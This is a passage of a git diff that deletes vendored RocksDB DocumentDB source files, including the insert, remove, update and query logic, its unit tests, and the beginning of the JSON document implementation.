-
-    batch.Put(primary_key_column_family_, primary_key_slice, encoded_document);
-
-    for (const auto& iter : name_to_index_) {
-      std::string secondary_index_key;
-      iter.second.index->GetIndexKey(document, &secondary_index_key);
-      IndexKey index_key(Slice(secondary_index_key), primary_key_slice);
-      batch.Put(iter.second.column_family, index_key.GetSliceParts(),
-                SliceParts());
-    }
-
-    return DocumentDB::Write(options, &batch);
-  }
-
-  virtual Status Remove(const ReadOptions& read_options,
-                        const WriteOptions& write_options,
-                        const JSONDocument& query) override {
-    MutexLock l(&write_mutex_);
-    std::unique_ptr<Cursor> cursor(
-        ConstructFilterCursor(read_options, nullptr, query));
-
-    WriteBatch batch;
-    for (; cursor->status().ok() && cursor->Valid(); cursor->Next()) {
-      const auto& document = cursor->document();
-      if (!document.IsObject()) {
-        return Status::Corruption("Document corruption");
-      }
-      if (!document.Contains(kPrimaryKey)) {
-        return Status::Corruption("Document corruption");
-      }
-      auto primary_key = document[kPrimaryKey];
-      if (primary_key.IsNull() ||
-          (!primary_key.IsString() && !primary_key.IsInt64())) {
-        return Status::Corruption("Document corruption");
-      }
-
-      // TODO(icanadi) Instead of doing this, just get primary key encoding from
-      // cursor, as it already has this information
-      std::string primary_key_encoded;
-      if (!EncodeJSONPrimitive(primary_key, &primary_key_encoded)) {
-        // previous call should be guaranteed to pass because of all primary_key
-        // conditions checked before
-        assert(false);
-      }
-      Slice primary_key_slice(primary_key_encoded);
-      batch.Delete(primary_key_column_family_, primary_key_slice);
-
-      for (const auto& iter : name_to_index_) {
-        std::string secondary_index_key;
-        iter.second.index->GetIndexKey(document, &secondary_index_key);
-        IndexKey index_key(Slice(secondary_index_key), primary_key_slice);
-        batch.Delete(iter.second.column_family, index_key.GetSliceParts());
-      }
-    }
-
-    if (!cursor->status().ok()) {
-      return cursor->status();
-    }
-
-    return DocumentDB::Write(write_options, &batch);
-  }
-
-  virtual Status Update(const ReadOptions& read_options,
-                        const WriteOptions& write_options,
-                        const JSONDocument& filter,
-                        const JSONDocument& updates) override {
-    MutexLock l(&write_mutex_);
-    std::unique_ptr<Cursor> cursor(
-        ConstructFilterCursor(read_options, nullptr, filter));
-
-    if (!updates.IsObject()) {
-        return Status::Corruption("Bad update document format");
-    }
-    WriteBatch batch;
-    for (; cursor->status().ok() && cursor->Valid(); cursor->Next()) {
-      const auto& old_document = cursor->document();
-      JSONDocument new_document(old_document);
-      if (!new_document.IsObject()) {
-        return Status::Corruption("Document corruption");
-      }
-      // TODO(icanadi) Make this nicer, something like class Filter
-      for (const auto& update : updates.Items()) {
-        if (update.first == "$set") {
-          JSONDocumentBuilder builder;
-          bool res __attribute__((unused)) = builder.WriteStartObject();
-          assert(res);
-          for (const auto& itr : update.second.Items()) {
-            if (itr.first == kPrimaryKey) {
-              return Status::NotSupported("Please don't change primary key");
-            }
-            res = builder.WriteKeyValue(itr.first, itr.second);
-            assert(res);
-          }
-          res = builder.WriteEndObject();
-          assert(res);
-          JSONDocument update_document = builder.GetJSONDocument();
-          builder.Reset();
-          res = builder.WriteStartObject();
-          assert(res);
-          for (const auto& itr : new_document.Items()) {
-            if (update_document.Contains(itr.first)) {
-              res = builder.WriteKeyValue(itr.first,
-                                          update_document[itr.first]);
-            } else {
-              res = builder.WriteKeyValue(itr.first, new_document[itr.first]);
-            }
-            assert(res);
-          }
-          res = builder.WriteEndObject();
-          assert(res);
-          new_document = builder.GetJSONDocument();
-          assert(new_document.IsOwner());
-        } else {
-          // TODO(icanadi) more commands
-          return Status::InvalidArgument("Can't understand update command");
-        }
-      }
-
-      // TODO(icanadi) reuse some of this code
-      if (!new_document.Contains(kPrimaryKey)) {
-        return Status::Corruption("Corrupted document -- primary key missing");
-      }
-      auto primary_key = new_document[kPrimaryKey];
-      if (primary_key.IsNull() ||
-          (!primary_key.IsString() && !primary_key.IsInt64())) {
-        // This will happen when document on storage doesn't have primary key,
-        // since we don't support any update operations on primary key. That's
-        // why this is corruption error
-        return Status::Corruption("Corrupted document -- primary key missing");
-      }
-      std::string encoded_document;
-      new_document.Serialize(&encoded_document);
-      std::string primary_key_encoded;
-      if (!EncodeJSONPrimitive(primary_key, &primary_key_encoded)) {
-        // previous call should be guaranteed to pass because of all primary_key
-        // conditions checked before
-        assert(false);
-      }
-      Slice primary_key_slice(primary_key_encoded);
-      batch.Put(primary_key_column_family_, primary_key_slice,
-                encoded_document);
-
-      for (const auto& iter : name_to_index_) {
-        std::string old_key, new_key;
-        iter.second.index->GetIndexKey(old_document, &old_key);
-        iter.second.index->GetIndexKey(new_document, &new_key);
-        if (old_key == new_key) {
-          // don't need to update this secondary index
-          continue;
-        }
-
-        IndexKey old_index_key(Slice(old_key), primary_key_slice);
-        IndexKey new_index_key(Slice(new_key), primary_key_slice);
-
-        batch.Delete(iter.second.column_family, old_index_key.GetSliceParts());
-        batch.Put(iter.second.column_family, new_index_key.GetSliceParts(),
-                  SliceParts());
-      }
-    }
-
-    if (!cursor->status().ok()) {
-      return cursor->status();
-    }
-
-    return DocumentDB::Write(write_options, &batch);
-  }
-
-  virtual Cursor* Query(const ReadOptions& read_options,
-                        const JSONDocument& query) override {
-    Cursor* cursor = nullptr;
-
-    if (!query.IsArray()) {
-      return new CursorError(
-          Status::InvalidArgument("Query has to be an array"));
-    }
-
-    // TODO(icanadi) support index "_id"
-    for (size_t i = 0; i < query.Count(); ++i) {
-      const auto& command_doc = query[i];
-      if (command_doc.Count() != 1) {
-        // there can be only one key-value pair in each of array elements.
-        // key is the command and value are the params
-        delete cursor;
-        return new CursorError(Status::InvalidArgument("Invalid query"));
-      }
-      const auto& command = *command_doc.Items().begin();
-
-      if (command.first == "$filter") {
-        cursor = ConstructFilterCursor(read_options, cursor, command.second);
-      } else {
-        // only filter is supported for now
-        delete cursor;
-        return new CursorError(Status::InvalidArgument("Invalid query"));
-      }
-    }
-
-    if (cursor == nullptr) {
-      cursor = new CursorFromIterator(
-          DocumentDB::NewIterator(read_options, primary_key_column_family_));
-    }
-
-    return cursor;
-  }
-
-  // RocksDB functions
-  using DB::Get;
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* value) override {
-    return Status::NotSupported("");
-  }
-  virtual Status Get(const ReadOptions& options, const Slice& key,
-                     std::string* value) override {
-    return Status::NotSupported("");
-  }
-  virtual Status Write(const WriteOptions& options,
-                       WriteBatch* updates) override {
-    return Status::NotSupported("");
-  }
-  virtual Iterator* NewIterator(const ReadOptions& options,
-                                ColumnFamilyHandle* column_family) override {
-    return nullptr;
-  }
-  virtual Iterator* NewIterator(const ReadOptions& options) override {
-    return nullptr;
-  }
-
- private:
-  Cursor* ConstructFilterCursor(ReadOptions read_options, Cursor* cursor,
-                                const JSONDocument& query) {
-    std::unique_ptr<const Filter> filter(Filter::ParseFilter(query));
-    if (filter.get() == nullptr) {
-      return new CursorError(Status::InvalidArgument("Invalid query"));
-    }
-
-    IndexColumnFamily tmp_storage(nullptr, nullptr);
-
-    if (cursor == nullptr) {
-      IndexColumnFamily* index_column_family = nullptr;
-      if (query.Contains("$index") && query["$index"].IsString()) {
-        {
-          auto index_name = query["$index"];
-          MutexLock l(&name_to_index_mutex_);
-          auto index_iter = name_to_index_.find(index_name.GetString());
-          if (index_iter != name_to_index_.end()) {
-            tmp_storage = index_iter->second;
-            index_column_family = &tmp_storage;
-          } else {
-            return new CursorError(
-                Status::InvalidArgument("Index does not exist"));
-          }
-        }
-      }
-
-      if (index_column_family != nullptr &&
-          index_column_family->index->UsefulIndex(*filter.get())) {
-        std::vector<Iterator*> iterators;
-        Status s = DocumentDB::NewIterators(
-            read_options,
-            {primary_key_column_family_, index_column_family->column_family},
-            &iterators);
-        if (!s.ok()) {
-          delete cursor;
-          return new CursorError(s);
-        }
-        assert(iterators.size() == 2);
-        return new CursorWithFilterIndexed(iterators[0], iterators[1],
-                                           index_column_family->index,
-                                           filter.release());
-      } else {
-        return new CursorWithFilter(
-            new CursorFromIterator(DocumentDB::NewIterator(
-                read_options, primary_key_column_family_)),
-            filter.release());
-      }
-    } else {
-      return new CursorWithFilter(cursor, filter.release());
-    }
-    assert(false);
-    return nullptr;
-  }
-
-  // currently, we lock and serialize all writes to rocksdb. reads are not
-  // locked and always get consistent view of the database. we should optimize
-  // locking in the future
-  port::Mutex write_mutex_;
-  port::Mutex name_to_index_mutex_;
-  const char* kPrimaryKey = "_id";
-  struct IndexColumnFamily {
-    IndexColumnFamily(Index* _index, ColumnFamilyHandle* _column_family)
-        : index(_index), column_family(_column_family) {}
-    Index* index;
-    ColumnFamilyHandle* column_family;
-  };
-
-
-  // name_to_index_ protected:
-  // 1) when writing -- 1. lock write_mutex_, 2. lock name_to_index_mutex_
-  // 2) when reading -- lock name_to_index_mutex_ OR write_mutex_
-  std::unordered_map<std::string, IndexColumnFamily> name_to_index_;
-  ColumnFamilyHandle* primary_key_column_family_;
-  Options rocksdb_options_;
-};
-
-namespace {
-Options GetRocksDBOptionsFromOptions(const DocumentDBOptions& options) {
-  Options rocksdb_options;
-  rocksdb_options.max_background_compactions = options.background_threads - 1;
-  rocksdb_options.max_background_flushes = 1;
-  rocksdb_options.write_buffer_size = options.memtable_size;
-  rocksdb_options.max_write_buffer_number = 6;
-  BlockBasedTableOptions table_options;
-  table_options.block_cache = NewLRUCache(options.cache_size);
-  rocksdb_options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  return rocksdb_options;
-}
-}  // namespace
-
-Status DocumentDB::Open(const DocumentDBOptions& options,
-                        const std::string& name,
-                        const std::vector<DocumentDB::IndexDescriptor>& indexes,
-                        DocumentDB** db, bool read_only) {
-  Options rocksdb_options = GetRocksDBOptionsFromOptions(options);
-  rocksdb_options.create_if_missing = true;
-
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(ColumnFamilyDescriptor(
-      kDefaultColumnFamilyName, ColumnFamilyOptions(rocksdb_options)));
-  for (const auto& index : indexes) {
-    column_families.emplace_back(InternalSecondaryIndexName(index.name),
-                                 ColumnFamilyOptions(rocksdb_options));
-  }
-  std::vector<ColumnFamilyHandle*> handles;
-  DB* base_db;
-  Status s;
-  if (read_only) {
-    s = DB::OpenForReadOnly(DBOptions(rocksdb_options), name, column_families,
-                            &handles, &base_db);
-  } else {
-    s = DB::Open(DBOptions(rocksdb_options), name, column_families, &handles,
-                 &base_db);
-  }
-  if (!s.ok()) {
-    return s;
-  }
-
-  std::vector<std::pair<Index*, ColumnFamilyHandle*>> index_cf(indexes.size());
-  assert(handles.size() == indexes.size() + 1);
-  for (size_t i = 0; i < indexes.size(); ++i) {
-    auto index = Index::CreateIndexFromDescription(*indexes[i].description,
-                                                   indexes[i].name);
-    index_cf[i] = {index, handles[i + 1]};
-  }
-  *db = new DocumentDBImpl(base_db, handles[0], index_cf, rocksdb_options);
-  return Status::OK();
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/document/document_db_test.cc b/thirdparty/rocksdb/utilities/document/document_db_test.cc
deleted file mode 100644
index e8f4138..0000000
--- a/thirdparty/rocksdb/utilities/document/document_db_test.cc
+++ /dev/null
@@ -1,336 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <algorithm>
-
-#include "rocksdb/utilities/json_document.h"
-#include "rocksdb/utilities/document_db.h"
-
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class DocumentDBTest : public testing::Test {
- public:
-  DocumentDBTest() {
-    dbname_ = test::TmpDir() + "/document_db_test";
-    DestroyDB(dbname_, Options());
-  }
-  ~DocumentDBTest() {
-    delete db_;
-    DestroyDB(dbname_, Options());
-  }
-
-  void AssertCursorIDs(Cursor* cursor, std::vector<int64_t> expected) {
-    std::vector<int64_t> got;
-    while (cursor->Valid()) {
-      ASSERT_TRUE(cursor->Valid());
-      ASSERT_TRUE(cursor->document().Contains("_id"));
-      got.push_back(cursor->document()["_id"].GetInt64());
-      cursor->Next();
-    }
-    std::sort(expected.begin(), expected.end());
-    std::sort(got.begin(), got.end());
-    ASSERT_TRUE(got == expected);
-  }
-
-  // converts ' to ", so that we don't have to escape " all over the place
-  std::string ConvertQuotes(const std::string& input) {
-    std::string output;
-    for (auto x : input) {
-      if (x == '\'') {
-        output.push_back('\"');
-      } else {
-        output.push_back(x);
-      }
-    }
-    return output;
-  }
-
-  void CreateIndexes(std::vector<DocumentDB::IndexDescriptor> indexes) {
-    for (auto i : indexes) {
-      ASSERT_OK(db_->CreateIndex(WriteOptions(), i));
-    }
-  }
-
-  JSONDocument* Parse(const std::string& doc) {
-    return JSONDocument::ParseJSON(ConvertQuotes(doc).c_str());
-  }
-
-  std::string dbname_;
-  DocumentDB* db_;
-};
-
-TEST_F(DocumentDBTest, SimpleQueryTest) {
-  DocumentDBOptions options;
-  DocumentDB::IndexDescriptor index;
-  index.description = Parse("{\"name\": 1}");
-  index.name = "name_index";
-
-  ASSERT_OK(DocumentDB::Open(options, dbname_, {}, &db_));
-  CreateIndexes({index});
-  delete db_;
-  // now there is index present
-  ASSERT_OK(DocumentDB::Open(options, dbname_, {index}, &db_));
-  delete index.description;
-
-  std::vector<std::string> json_objects = {
-      "{\"_id\': 1, \"name\": \"One\"}",   "{\"_id\": 2, \"name\": \"Two\"}",
-      "{\"_id\": 3, \"name\": \"Three\"}", "{\"_id\": 4, \"name\": \"Four\"}"};
-
-  for (auto& json : json_objects) {
-    std::unique_ptr<JSONDocument> document(Parse(json));
-    ASSERT_TRUE(document.get() != nullptr);
-    ASSERT_OK(db_->Insert(WriteOptions(), *document));
-  }
-
-  // inserting a document with existing primary key should return failure
-  {
-    std::unique_ptr<JSONDocument> document(Parse(json_objects[0]));
-    ASSERT_TRUE(document.get() != nullptr);
-    Status s = db_->Insert(WriteOptions(), *document);
-    ASSERT_TRUE(s.IsInvalidArgument());
-  }
-
-  // find equal to "Two"
-  {
-    std::unique_ptr<JSONDocument> query(
-        Parse("[{'$filter': {'name': 'Two', '$index': 'name_index'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {2});
-  }
-
-  // find less than "Three"
-  {
-    std::unique_ptr<JSONDocument> query(Parse(
-        "[{'$filter': {'name': {'$lt': 'Three'}, '$index': "
-        "'name_index'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-
-    AssertCursorIDs(cursor.get(), {1, 4});
-  }
-
-  // find less than "Three" without index
-  {
-    std::unique_ptr<JSONDocument> query(
-        Parse("[{'$filter': {'name': {'$lt': 'Three'} }}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {1, 4});
-  }
-
-  // remove less or equal to "Three"
-  {
-    std::unique_ptr<JSONDocument> query(
-        Parse("{'name': {'$lte': 'Three'}, '$index': 'name_index'}"));
-    ASSERT_OK(db_->Remove(ReadOptions(), WriteOptions(), *query));
-  }
-
-  // find all -- only "Two" left, everything else should be deleted
-  {
-    std::unique_ptr<JSONDocument> query(Parse("[]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {2});
-  }
-}
-
-TEST_F(DocumentDBTest, ComplexQueryTest) {
-  DocumentDBOptions options;
-  DocumentDB::IndexDescriptor priority_index;
-  priority_index.description = Parse("{'priority': 1}");
-  priority_index.name = "priority";
-  DocumentDB::IndexDescriptor job_name_index;
-  job_name_index.description = Parse("{'job_name': 1}");
-  job_name_index.name = "job_name";
-  DocumentDB::IndexDescriptor progress_index;
-  progress_index.description = Parse("{'progress': 1}");
-  progress_index.name = "progress";
-
-  ASSERT_OK(DocumentDB::Open(options, dbname_, {}, &db_));
-  CreateIndexes({priority_index, progress_index});
-  delete priority_index.description;
-  delete progress_index.description;
-
-  std::vector<std::string> json_objects = {
-      "{'_id': 1, 'job_name': 'play', 'priority': 10, 'progress': 14.2}",
-      "{'_id': 2, 'job_name': 'white', 'priority': 2, 'progress': 45.1}",
-      "{'_id': 3, 'job_name': 'straw', 'priority': 5, 'progress': 83.2}",
-      "{'_id': 4, 'job_name': 'temporary', 'priority': 3, 'progress': 14.9}",
-      "{'_id': 5, 'job_name': 'white', 'priority': 4, 'progress': 44.2}",
-      "{'_id': 6, 'job_name': 'tea', 'priority': 1, 'progress': 12.4}",
-      "{'_id': 7, 'job_name': 'delete', 'priority': 2, 'progress': 77.54}",
-      "{'_id': 8, 'job_name': 'rock', 'priority': 3, 'progress': 93.24}",
-      "{'_id': 9, 'job_name': 'steady', 'priority': 3, 'progress': 9.1}",
-      "{'_id': 10, 'job_name': 'white', 'priority': 1, 'progress': 61.4}",
-      "{'_id': 11, 'job_name': 'who', 'priority': 4, 'progress': 39.41}",
-      "{'_id': 12, 'job_name': 'who', 'priority': -1, 'progress': 39.42}",
-      "{'_id': 13, 'job_name': 'who', 'priority': -2, 'progress': 39.42}", };
-
-  // add index on the fly!
-  CreateIndexes({job_name_index});
-  delete job_name_index.description;
-
-  for (auto& json : json_objects) {
-    std::unique_ptr<JSONDocument> document(Parse(json));
-    ASSERT_TRUE(document != nullptr);
-    ASSERT_OK(db_->Insert(WriteOptions(), *document));
-  }
-
-  // 2 < priority < 4 AND progress > 10.0, index priority
-  {
-    std::unique_ptr<JSONDocument> query(Parse(
-        "[{'$filter': {'priority': {'$lt': 4, '$gt': 2}, 'progress': {'$gt': "
-        "10.0}, '$index': 'priority'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {4, 8});
-  }
-
-  // -1 <= priority <= 1, index priority
-  {
-    std::unique_ptr<JSONDocument> query(Parse(
-        "[{'$filter': {'priority': {'$lte': 1, '$gte': -1},"
-        " '$index': 'priority'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {6, 10, 12});
-  }
-
-  // 2 < priority < 4 AND progress > 10.0, index progress
-  {
-    std::unique_ptr<JSONDocument> query(Parse(
-        "[{'$filter': {'priority': {'$lt': 4, '$gt': 2}, 'progress': {'$gt': "
-        "10.0}, '$index': 'progress'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {4, 8});
-  }
-
-  // job_name == 'white' AND priority >= 2, index job_name
-  {
-    std::unique_ptr<JSONDocument> query(Parse(
-        "[{'$filter': {'job_name': 'white', 'priority': {'$gte': "
-        "2}, '$index': 'job_name'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {2, 5});
-  }
-
-  // 35.0 <= progress < 65.5, index progress
-  {
-    std::unique_ptr<JSONDocument> query(Parse(
-        "[{'$filter': {'progress': {'$gt': 5.0, '$gte': 35.0, '$lt': 65.5}, "
-        "'$index': 'progress'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {2, 5, 10, 11, 12, 13});
-  }
-
-  // 2 < priority <= 4, index priority
-  {
-    std::unique_ptr<JSONDocument> query(Parse(
-        "[{'$filter': {'priority': {'$gt': 2, '$lt': 8, '$lte': 4}, "
-        "'$index': 'priority'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {4, 5, 8, 9, 11});
-  }
-
-  // Delete all whose progress is bigger than 50%
-  {
-    std::unique_ptr<JSONDocument> query(
-        Parse("{'progress': {'$gt': 50.0}, '$index': 'progress'}"));
-    ASSERT_OK(db_->Remove(ReadOptions(), WriteOptions(), *query));
-  }
-
-  // 2 < priority < 6, index priority
-  {
-    std::unique_ptr<JSONDocument> query(Parse(
-        "[{'$filter': {'priority': {'$gt': 2, '$lt': 6}, "
-        "'$index': 'priority'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {4, 5, 9, 11});
-  }
-
-  // update set priority to 10 where job_name is 'white'
-  {
-    std::unique_ptr<JSONDocument> query(Parse("{'job_name': 'white'}"));
-    std::unique_ptr<JSONDocument> update(Parse("{'$set': {'priority': 10}}"));
-    ASSERT_OK(db_->Update(ReadOptions(), WriteOptions(), *query, *update));
-  }
-
-  // update twice: set priority to 15 where job_name is 'white'
-  {
-    std::unique_ptr<JSONDocument> query(Parse("{'job_name': 'white'}"));
-    std::unique_ptr<JSONDocument> update(Parse("{'$set': {'priority': 10},"
-                                               "'$set': {'priority': 15}}"));
-    ASSERT_OK(db_->Update(ReadOptions(), WriteOptions(), *query, *update));
-  }
-
-  // update twice: set priority to 15 and
-  // progress to 40 where job_name is 'white'
-  {
-    std::unique_ptr<JSONDocument> query(Parse("{'job_name': 'white'}"));
-    std::unique_ptr<JSONDocument> update(
-        Parse("{'$set': {'priority': 10, 'progress': 35},"
-              "'$set': {'priority': 15, 'progress': 40}}"));
-    ASSERT_OK(db_->Update(ReadOptions(), WriteOptions(), *query, *update));
-  }
-
-  // priority < 0
-  {
-    std::unique_ptr<JSONDocument> query(
-        Parse("[{'$filter': {'priority': {'$lt': 0}, '$index': 'priority'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    ASSERT_OK(cursor->status());
-    AssertCursorIDs(cursor.get(), {12, 13});
-  }
-
-  // -2 < priority < 0
-  {
-    std::unique_ptr<JSONDocument> query(
-        Parse("[{'$filter': {'priority': {'$gt': -2, '$lt': 0},"
-        " '$index': 'priority'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    ASSERT_OK(cursor->status());
-    AssertCursorIDs(cursor.get(), {12});
-  }
-
-  // -2 <= priority < 0
-  {
-    std::unique_ptr<JSONDocument> query(
-        Parse("[{'$filter': {'priority': {'$gte': -2, '$lt': 0},"
-        " '$index': 'priority'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    ASSERT_OK(cursor->status());
-    AssertCursorIDs(cursor.get(), {12, 13});
-  }
-
-  // 4 < priority
-  {
-    std::unique_ptr<JSONDocument> query(
-        Parse("[{'$filter': {'priority': {'$gt': 4}, '$index': 'priority'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    ASSERT_OK(cursor->status());
-    AssertCursorIDs(cursor.get(), {1, 2, 5});
-  }
-
-  Status s = db_->DropIndex("doesnt-exist");
-  ASSERT_TRUE(!s.ok());
-  ASSERT_OK(db_->DropIndex("priority"));
-}
-
-}  //  namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as DocumentDB is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/document/json_document.cc b/thirdparty/rocksdb/utilities/document/json_document.cc
deleted file mode 100644
index 6917923..0000000
--- a/thirdparty/rocksdb/utilities/document/json_document.cc
+++ /dev/null
@@ -1,609 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/json_document.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <assert.h>
-#include <inttypes.h>
-#include <string.h>
-
-#include <functional>
-#include <limits>
-#include <map>
-#include <memory>
-#include <string>
-#include <vector>
-
-
-#include "third-party/fbson/FbsonDocument.h"
-#include "third-party/fbson/FbsonJsonParser.h"
-#include "third-party/fbson/FbsonUtil.h"
-#include "util/coding.h"
-
-using std::placeholders::_1;
-
-namespace {
-
-size_t ObjectNumElem(const fbson::ObjectVal& objectVal) {
-  size_t size = 0;
-  for (auto keyValuePair : objectVal) {
-    (void)keyValuePair;
-    ++size;
-  }
-  return size;
-}
-
-template <typename Func>
-void InitJSONDocument(std::unique_ptr<char[]>* data,
-                      fbson::FbsonValue** value,
-                      Func f) {
-  // TODO(stash): maybe add function to FbsonDocument to avoid creating array?
-  fbson::FbsonWriter writer;
-  bool res __attribute__((unused)) = writer.writeStartArray();
-  assert(res);
-  uint32_t bytesWritten __attribute__((unused)) = f(writer);
-  assert(bytesWritten != 0);
-  res = writer.writeEndArray();
-  assert(res);
-  char* buf = new char[writer.getOutput()->getSize()];
-  memcpy(buf, writer.getOutput()->getBuffer(), writer.getOutput()->getSize());
-
-  *value = ((fbson::FbsonDocument *)buf)->getValue();
-  assert((*value)->isArray());
-  assert(((fbson::ArrayVal*)*value)->numElem() == 1);
-  *value = ((fbson::ArrayVal*)*value)->get(0);
-  data->reset(buf);
-}
-
-void InitString(std::unique_ptr<char[]>* data,
-                fbson::FbsonValue** value,
-                const std::string& s) {
-  InitJSONDocument(data, value, std::bind(
-      [](fbson::FbsonWriter& writer, const std::string& str) -> uint32_t {
-        bool res __attribute__((unused)) = writer.writeStartString();
-        assert(res);
-        auto bytesWritten = writer.writeString(str.c_str(),
-                            static_cast<uint32_t>(str.length()));
-        res = writer.writeEndString();
-        assert(res);
-        // If the string is empty, then bytesWritten == 0, and assert in
-        // InitJsonDocument will fail.
-        return bytesWritten + static_cast<uint32_t>(str.empty());
-      },
-  _1, s));
-}
-
-bool IsNumeric(fbson::FbsonValue* value) {
-  return value->isInt8() || value->isInt16() ||
-         value->isInt32() ||  value->isInt64();
-}
-
-int64_t GetInt64ValFromFbsonNumericType(fbson::FbsonValue* value) {
-  switch (value->type()) {
-    case fbson::FbsonType::T_Int8:
-      return reinterpret_cast<fbson::Int8Val*>(value)->val();
-    case fbson::FbsonType::T_Int16:
-      return reinterpret_cast<fbson::Int16Val*>(value)->val();
-    case fbson::FbsonType::T_Int32:
-      return reinterpret_cast<fbson::Int32Val*>(value)->val();
-    case fbson::FbsonType::T_Int64:
-      return reinterpret_cast<fbson::Int64Val*>(value)->val();
-    default:
-      assert(false);
-  }
-  return 0;
-}
-
-bool IsComparable(fbson::FbsonValue* left, fbson::FbsonValue* right) {
-  if (left->type() == right->type()) {
-    return true;
-  }
-  if (IsNumeric(left) && IsNumeric(right)) {
-    return true;
-  }
-  return false;
-}
-
-void CreateArray(std::unique_ptr<char[]>* data, fbson::FbsonValue** value) {
-  fbson::FbsonWriter writer;
-  bool res __attribute__((unused)) = writer.writeStartArray();
-  assert(res);
-  res = writer.writeEndArray();
-  assert(res);
-  data->reset(new char[writer.getOutput()->getSize()]);
-  memcpy(data->get(),
-         writer.getOutput()->getBuffer(),
-         writer.getOutput()->getSize());
-  *value = reinterpret_cast<fbson::FbsonDocument*>(data->get())->getValue();
-}
-
-void CreateObject(std::unique_ptr<char[]>* data, fbson::FbsonValue** value) {
-  fbson::FbsonWriter writer;
-  bool res __attribute__((unused)) = writer.writeStartObject();
-  assert(res);
-  res = writer.writeEndObject();
-  assert(res);
-  data->reset(new char[writer.getOutput()->getSize()]);
-  memcpy(data->get(),
-         writer.getOutput()->getBuffer(),
-         writer.getOutput()->getSize());
-  *value = reinterpret_cast<fbson::FbsonDocument*>(data->get())->getValue();
-}
-
-}  // namespace
-
-namespace rocksdb {
-
-
-// TODO(stash): find smth easier
-JSONDocument::JSONDocument() {
-  InitJSONDocument(&data_,
-                   &value_,
-                   std::bind(&fbson::FbsonWriter::writeNull, _1));
-}
-
-JSONDocument::JSONDocument(bool b) {
-  InitJSONDocument(&data_,
-                   &value_,
-                   std::bind(&fbson::FbsonWriter::writeBool, _1, b));
-}
-
-JSONDocument::JSONDocument(double d) {
-  InitJSONDocument(&data_,
-                   &value_,
-                   std::bind(&fbson::FbsonWriter::writeDouble, _1, d));
-}
-
-JSONDocument::JSONDocument(int8_t i) {
-  InitJSONDocument(&data_,
-                   &value_,
-                   std::bind(&fbson::FbsonWriter::writeInt8, _1, i));
-}
-
-JSONDocument::JSONDocument(int16_t i) {
-  InitJSONDocument(&data_,
-                   &value_,
-                   std::bind(&fbson::FbsonWriter::writeInt16, _1, i));
-}
-
-JSONDocument::JSONDocument(int32_t i) {
-  InitJSONDocument(&data_,
-                   &value_,
-                   std::bind(&fbson::FbsonWriter::writeInt32, _1, i));
-}
-
-JSONDocument::JSONDocument(int64_t i) {
-  InitJSONDocument(&data_,
-                   &value_,
-                   std::bind(&fbson::FbsonWriter::writeInt64, _1, i));
-}
-
-JSONDocument::JSONDocument(const std::string& s) {
-  InitString(&data_, &value_, s);
-}
-
-JSONDocument::JSONDocument(const char* s) : JSONDocument(std::string(s)) {
-}
-
-void JSONDocument::InitFromValue(const fbson::FbsonValue* val) {
-  data_.reset(new char[val->numPackedBytes()]);
-  memcpy(data_.get(), val, val->numPackedBytes());
-  value_ = reinterpret_cast<fbson::FbsonValue*>(data_.get());
-}
-
-// Private constructor
-JSONDocument::JSONDocument(fbson::FbsonValue* val, bool makeCopy) {
-  if (makeCopy) {
-    InitFromValue(val);
-  } else {
-    value_ = val;
-  }
-}
-
-JSONDocument::JSONDocument(Type _type) {
-  // TODO(icanadi) make all of this better by using templates
-  switch (_type) {
-    case kNull:
-      InitJSONDocument(&data_, &value_,
-                       std::bind(&fbson::FbsonWriter::writeNull, _1));
-      break;
